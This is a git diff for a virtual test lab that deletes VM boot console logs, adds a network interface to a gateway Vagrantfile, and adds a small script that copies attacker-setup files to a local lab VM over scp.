daemon socket. -[ 13.296617] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Requests to Wall Directory Watch. -[ 13.343238] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 13.371883] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 13.418640] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. -[ 13.506358] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 13.523222] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 13.547220] systemd[1]: Starting Remount Root and Kernel File Systems... -[ 13.558599] EXT4-fs (sda1): re-mounted. Opts: (null) - Starting Remount Root and Kernel File Systems... -[ 13.615306] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 13.632447] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 13.729798] systemd[1]: Starting Nameserver information manager... - Starting Nameserver inf[ 13.744966] Loading iSCSI transport class v2.0-870. -ormation manager... -[ 13.763486] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 13.862243] iscsi: registered transport (tcp) -[ 13.867762] systemd[1]: Reached target Slices. -[ OK ] Reached target Slices. -[ 13.907654] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 13.977817] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 14.051149] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 14.115090] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 14.133858] systemd[1]: Listening on Syslog Socket. -[ OK [0[ 14.157665] iscsi: registered transport (iser) -m] Listening on Syslog Socket. -[ 14.202986] systemd[1]: Starting Journal Service... - Starting Journal Service... -[ 14.225610] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 14.255671] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 14.314521] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 14.379443] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 14.413426] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 14.446697] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 14.492892] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 14.526638] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 14.552947] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK ] Started Remount Root and Kernel File Systems. -[ OK ] Started Set console keymap. -[ OK ] Started Load Kernel Modules. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ OK ] Started Uncomplicated firewall. -[ OK ] Started Nameserver information manager. -[ OK ] Started LVM2 metadata daemon. - Starting Create Static Device Nodes in /dev... - Mounting FUSE Control File System... - Starting Apply Kernel Variables... - Starting Load/Save Random Seed... - Starting udev Coldplug all Devices... - Starting Flush Journal to Persistent Storage... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started Create Static Device Nodes in /dev. -[ OK ] Started Apply Kernel Variables. -[ OK ] Started Load/Save Random Seed. - Starting udev Kernel Device Manager... -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting Tell Plymouth To Write Out Runtime Data... - Starting Initial cloud-init job (pre-networking)... - Starting Set console font and keymap... - Starting LSB: AppArmor initialization... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. - Starting Create Volatile Files and Directories... -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Create Volatile Files and Directories. - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Found device /dev/ttyS0. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. - Starting Load AppArmor profiles managed internally by snapd... -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Started Set console font and keymap. -[ OK ] Created slice system-getty.slice. -[ 18.632741] cloud-init[467]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:33 +0000. Up 17.76 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s3. - Starting Raise network interfaces... -[ OK ] Started ifup for enp0s8. -[ OK ] Started Raise network interfaces. -[ OK ] Reached target Network. - Starting Initial cloud-init job (metadata service crawler)... -[ 20.210737] cloud-init[1076]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:35 +0000. Up 19.88 seconds. -[ 20.241428] cloud-init[1076]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ -[ 20.264178] cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 20.278074] [ OK ] Started Initial cloud-init job (metadata service crawler). -[ OK ] Reached target System Initialization. -cloud-init[1076]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 20.306705] Starting Docker Socket for the API. -[ OK ] Started Daily Cleanup of Temporary Directories. -cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 20.330907] Starting LXD - unix socket. -[ OK ] Listening on ACPID Listen Socket. -cloud-init[1076]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | -[ 20.393367] Starting Socket activation for snappy daemon. -cloud-init[1076]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 20.442043] [ OK ] Started ACPI Events Check. -cloud-init[1076]: ci-info: | enp0s8 | True | 192.168.3.2 | 255.255.255.0 | global | 08:00:27:48:2b:b0 | -[ OK ] Reached target Paths. -[ OK ] Listening on D-Bus System Message Bus Socket. -[ 20.445928] cloud-init[1076]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe48:2bb0/64 | . | link | 08:00:27:48:2b:b0 | -[ 20.567175] cloud-init[1076]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ OK ] Started Message of the Day. -[ 20.572229] [cloud-init OK [1076]: ] ci-info: | lo | True | ::1/128 | . | host | . |Started Daily apt download activities. - -[ 20.632117] [ OK ] Started Daily apt upgrade and clean activities. -[ OK ] Reached target Timers. -cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 20.712457] [cloud-init OK [1076]: ] ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++Listening on UUID daemon activation socket. - -[ 20.794985] [cloud-init OK [1076]: ] ci-info: +-------+-------------+---------------+---------------+-----------+-------+Reached target Network is Online. - -[ 20.795508] cloud-init[1076]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 20.872674] cloud-init[1076]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 20.942916] cloud-initStarting iSCSI initiator daemon (iscsid)...[1076]: -ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 21.032697] [cloud-init OK [1076]: ] ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U |Reached target Cloud-config availability. - -[ OK ] Listening on Docker Socket for the API. -[ OK ] Listening on LXD - unix socket. -[ OK ] Listening on Socket activation for snappy daemon. -[ 21.033132] cloud-init[1076]: ci-info: | 2 | 192.168.0.0 | 192.168.3.254 | 255.255.0.0 | enp0s8 | UG | -[ 21.280687] cloud-init[1076]: ci-info: | 3 | 192.168.3.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 21.303405] cloud-init[1076]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 21.369935] cloud-init[1076]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 21.434472] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ -[[ 21.503123] cloud-init[1076]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 21.503281] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 21.503568] cloud-init[1076]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | -[ 21.503628] cloud-init[1076]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | -[ 21.503679] cloud-init[1076]: ci-info: | 5 | ff00::/8 | :: | enp0s8 | U | -[ 21.503892] cloud-init[1076]: ci-info: | 6 | ff00::/8 | :: | enp0s3 | U | -[ 21.503954] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ - OK ] Reached target Sockets. -[ OK ] Reached target Basic System. - Starting Virtualbox guest utils... -[ OK ] Started Deferred execution scheduler. - Starting Accounts Service... - Starting /etc/rc.local Compatibility... - Starting Login Service... - Starting LSB: Record successful boot for GRUB... - Starting Snap Daemon... - Starting System Logging Service... - Starting LXD - container startup/shutdown... - Starting containerd container runtime... -[ OK ] Started FUSE filesystem for LXC. - Starting OpenBSD Secure Shell server... -[ OK ] Started D-Bus System Message Bus. - Starting LSB: MD monitoring daemon... -[ OK ] Started ACPI event daemon. -[ OK ] Started Regular background program processing daemon. -[ OK ] Started System Logging Service. -[ OK ] Started iSCSI initiator daemon (iscsid). -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started OpenBSD Secure Shell server. - Starting Authenticate and Authorize Users to Run Privileged Tasks... - Starting Login to default iSCSI targets... -[ OK ] Started Snap Daemon. -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started Login Service. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Accounts Service. -[ OK ] Started Unattended Upgrades Shutdown. - Starting Wait until snapd is fully seeded... -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Wait until snapd is fully seeded. - Starting Apply the settings specified in cloud-config... -[ OK ] Started Login to default iSCSI targets. -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting Permit User Sessions... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting LSB: daemon to balance interrupts for SMP systems... - Starting LSB: automatic crash report generation... -[ OK ] Started Permit User Sessions. - Starting Hold until boot process finishes up... - Starting Terminate Plymouth Boot Screen... -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started containerd container runtime. - Starting Docker Application Container Engine... -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Started Getty on tty1. -[ OK ] Reached target Login Prompts. - Starting Set console scheme... -[ OK ] Started Set console scheme. -[ 25.737831] cloud-init[1297]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.42 seconds. -[ OK ] Started Apply the settings specified in cloud-config. -[ OK ] Started Docker Application Container Engine. -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Execute cloud user/final scripts... - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 27.912122] cloud-init[1732]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:43 +0000. Up 27.83 seconds. -[ 27.929181] cloud-init[1732]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:43 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.90 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS vague-web-server ttyS0 - -vague-web-server login: \ No newline at end of file diff --git a/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index f224186..0000000 --- a/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/routers/gateway \ No newline at end of file diff --git a/virtual-test-environment/routers/gateway/Vagrantfile b/virtual-test-environment/routers/gateway/Vagrantfile index 9b97850..91384ab 100644 --- a/virtual-test-environment/routers/gateway/Vagrantfile +++ b/virtual-test-environment/routers/gateway/Vagrantfile @@ -1,5 +1,4 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| @@ -10,6 +9,7 @@ Vagrant.configure(2) do |config| config.ssh.insert_key = true config.vm.network "private_network", ip: "192.168.1.2", virtualbox__intnet: "intnet-1" + config.vm.network "private_network", ip: "172.16.4.254", virtualbox__intnet: "intnet-4" config.vm.provider "virtualbox" do |vb| diff --git a/virtual-test-environment/routers/gateway/copy_attacker_setup.sh b/virtual-test-environment/routers/gateway/copy_attacker_setup.sh new file mode 100755 index 0000000..09a515c --- /dev/null +++ b/virtual-test-environment/routers/gateway/copy_attacker_setup.sh @@ -0,0 +1,11 @@ +#!/bin/bash +# + + +echo Copying attacker setup scripts to router1 VM.. + + +scp -i .vagrant/machines/default/virtualbox/private_key -P 22117 ../../edgers/setups/attacker/setup_attacker* vagrant@localhost:~ + + + diff --git a/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index 346affc..0000000 --- a/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,654 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializng cgroup subsys cpu -[ 0.000000] Initializing cgroupp subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IME=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usble -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usablle -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fff0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hyprvvisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3fe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 3638659221 cycles -[ 0.000000]locksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 0.000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] M: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Regstered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.00000] PM Registered nosave memory: [mem 0x00a0000-0x000effff] -[ 0.00000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI dvices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refine-jiffies: mak: 0xffffffff ma_cycles: 0xffffffff, max_idle_ns 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ds:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total ages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PIDhash table entries: 4096 (orer: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.00000] Kernel/User page tables isolation: enabled -[ 0.000000 Hierarcical RCU implementation. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.00000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 1.914660] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 1.921137] pid_max: default: 32768 minimum: 301 -[ 1.926171] ACPI: Core revision 20150930 -[ 1.931654] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 1.937371] Security Framework initialized -[ 1.940780] Yama: becoming mindful. -[ 1.944119] AppArmor: AppArmor initialized -[ 1.947376] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 1.952841] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 1.959115] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.963797] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.969677] Initializing cgroup subsys io -[ 1.973469] Initializing cgroup subsys memory -[ 1.978011] Initializing cgroup subsys devices -[ 1.983444] Initializing cgroup subsys freezer -[ 1.986917] Initializing cgroup subsys net_cls -[ 1.989574] Initializing cgroup subsys perf_event -[ 1.992340] Initializing cgroup subsys net_prio -[ 1.996137] Initializing cgroup subsys hugetlb -[ 1.999936] Initializing cgroup subsys pids -[ 2.028076] mce: CPU supports 0 MCE banks -[ 2.031865] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 2.036505] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 2.042734] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 2.046214] Spectre V2 : Mitigation: Full generic retpoline -[ 2.051163] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 2.056908] Speculative Store Bypass: Vulnerable -[ 2.062103] SRBDS: Unknown: Dependent on hypervisor status -[ 2.068567] MDS: Mitigation: Clear CPU buffers -[ 2.075986] Freeing SMP alternatives memory: 36K -[ 2.091493] ftrace: allocating 32339 entries in 127 pages -[ 2.227560] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 2.231835] smpboot: Max logical packages: 1 -[ 2.235842] x2apic enabled -[ 2.240228] Switched APIC routing to physical x2apic. -[ 2.247754] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 2.360138] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 2.365798] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 2.392706] KVM setup paravirtual spinlock -[ 2.397876] x86: Booting SMP configuration: -[ 2.401572] .... node #0, CPUs: #1 -[ 2.404865] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 2.428366] mce: CPU supports 0 MCE banks -[ 2.472757] x86: Booted up 1 node, 2 CPUs -[ 2.475787] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 2.484688] devtmpfs: initialized -[ 2.503437] evm: security.selinux -[ 2.507617] evm: security.SMACK64 -[ 2.509076] evm: security.SMACK64EXEC -[ 2.509973] evm: security.SMACK64TRANSMUTE -[ 2.513128] evm: security.SMACK64MMAP -[ 2.516856] evm: security.ima -[ 2.518165] evm: security.capability -[ 2.520513] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 2.524865] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 2.528489] pinctrl core: initialized pinctrl subsystem -[ 2.529962] RTC time: 22:38:14, date: 01/25/21 -[ 2.532920] NET: Registered protocol family 16 -[ 2.546583] cpuidle: using governor ladder -[ 2.558544] cpuidle: using governor menu -[ 2.559572] PCCT header not found. -[ 2.567654] ACPI: bus type PCI registered -[ 2.569937] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 2.572083] PCI: Using configuration type 1 for base access -[ 2.591002] ACPI: Added _OSI(Module Device) -[ 2.598693] ACPI: Added _OSI(Processor Device) -[ 2.601612] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 2.602774] ACPI: Added _OSI(Processor Aggregator Device) -[ 2.607775] ACPI: Executed 1 blocks of module-level executable AML code -[ 2.619840] ACPI: Interpreter enabled -[ 2.622784] ACPI: (supports S0 S5) -[ 2.637377] ACPI: Using IOAPIC for interrupt routing -[ 2.639412] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 2.680509] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 2.683927] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 2.688655] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 2.711566] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 2.738439] PCI host bridge to bus 0000:00 -[ 2.741572] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 2.746255] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 2.753526] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 2.759435] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 2.763940] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 2.779949] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 2.783499] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 2.787197] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 2.827670] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 2.872200] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 2.879309] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 2.922032] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 2.929937] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 2.935865] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 2.941907] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 2.950001] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 2.955324] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 2.964354] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 2.976317] vgaarb: loaded -[ 2.979448] vgaarb: bridge control possible 0000:00:02.0 -[ 2.983784] SCSI subsystem initialized -[ 2.987899] ACPI: bus type USB registered -[ 2.995950] usbcore: registered new interface driver usbfs -[ 3.002057] usbcore: registered new interface driver hub -[ 3.007757] usbcore: registered new device driver usb -[ 3.025008] PCI: Using ACPI for IRQ routing -[ 3.027857] NetLabel: Initializing -[ 3.031885] NetLabel: domain hash size = 128 -[ 3.035063] NetLabel: protocols = UNLABELED CIPSOv4 -[ 3.038717] NetLabel: unlabeled traffic allowed by default -[ 3.047884] amd_nb: Cannot enumerate AMD northbridges -[ 3.051453] clocksource: Switched to clocksource kvm-clock -[ 3.075228] AppArmor: AppArmor Filesystem Enabled -[ 3.078497] pnp: PnP ACPinit -[ 3.213822] pnp: PnP ACPI: found 3 devices - -[ 3.234531] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 3.25255] NET: Registered protocol family 2 - -[ 3.389762] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 3.391055] TCP bind hash table entries: 8192 (order: 5, 131072 byte -[ 3.480673] TCP: Hash tables configured (established 8192 bind 8192) -[ 3.483336] UDP hashtable etries: 512 (order: 2, 16384 bytes) -[ 3.682013] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 3.685425 NET: Registed protocol family 1 -[ 3.873945] pci 0000:00:00.0: Limiting direct PCI/PCI transfers -[ 3.877914] pci 0000:00:01.0: Activating ISA DMA hang workarounds -[ 3.895725] Unpacking initramfs... - -[ 4.390451] Freeing initrd memory: 14880K -[ 4.397531] clocksource: tsc: mask: 